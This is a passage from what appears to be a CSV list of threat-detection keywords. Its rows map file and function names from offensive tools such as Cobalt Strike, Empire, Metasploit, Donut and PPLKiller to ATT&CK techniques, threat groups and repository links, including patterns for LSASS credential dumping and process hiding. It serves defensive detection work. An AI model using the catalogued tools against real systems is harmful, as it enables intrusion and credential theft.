APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessEncryptedC2Request*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*ProcessFileZillaFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*processhacker-*-sdk.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*processhacker-*-setup.exe*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*processhacker-*-src.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*ProcessHacker.exe*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*ProcessHacker.sln*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*ProcessHerpaderping_x64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderping_x86*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderpingTemplate*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*processhider.c*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*-ProcessID * -Dll * -Module *","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*processImplantMessage*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*process-inject *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*processinject_min_alloc*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*ProcessManager.exe --machine *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*ProcessManager.exe --name explorer*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*processPIDByName*lsass.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*ProcessPPKFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessPuTTYLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessSuperPuTTYFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Process-TaskingPackets*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughRemote*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - 